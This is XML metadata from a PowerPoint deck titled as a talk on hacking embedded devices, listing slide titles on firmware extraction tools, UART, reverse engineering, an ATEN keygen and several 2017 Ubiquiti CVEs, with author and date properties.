      <vt:lpstr>Target</vt:lpstr>
      <vt:lpstr>SPI Pinout</vt:lpstr>
      <vt:lpstr>BusPirate</vt:lpstr>
      <vt:lpstr>Using flashrom</vt:lpstr>
      <vt:lpstr>Using binwalk</vt:lpstr>
      <vt:lpstr>Binary Emulation</vt:lpstr>
      <vt:lpstr>Serial Interface UART</vt:lpstr>
      <vt:lpstr>UART Interface</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reverse Engineering</vt:lpstr>
      <vt:lpstr>Reverse Engineering</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Reverse Engineering</vt:lpstr>
      <vt:lpstr>Reverse Engineering</vt:lpstr>
      <vt:lpstr>Reverse Engineering</vt:lpstr>
      <vt:lpstr>Reverse Engineering</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Bootloader ATEN Keygen</vt:lpstr>
      <vt:lpstr>Reversing the ATEN algorithm</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>UBNT Findings</vt:lpstr>
      <vt:lpstr>CVE-2017-0935 – Privilege Escalation with Session Hijacking</vt:lpstr>
      <vt:lpstr>CVE-2017-0935 – Privilege Escalation with Session Hijacking</vt:lpstr>
      <vt:lpstr>CVE-2017-0934 – Privilege Escalation with Session Hijacking</vt:lpstr>
      <vt:lpstr>CVE-2017-0933 – CSRF Bypassing “Referer:” Whitelisting Protection</vt:lpstr>
      <vt:lpstr>CVE-2017-0932 - Privilege Escalation using API-&gt;Feature</vt:lpstr>
      <vt:lpstr>CVE-2017-0932 - Privilege Escalation using API-&gt;Feature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Sh*t Hacking Embedded Devices</dc:title>
  <dc:creator>Maycon Vitali</dc:creator>
  <cp:lastModifiedBy>Maycon Vitali</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-20T14:40:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-20T14:40:29Z</dcterms:modified>
</cp:coreProperties>
</file>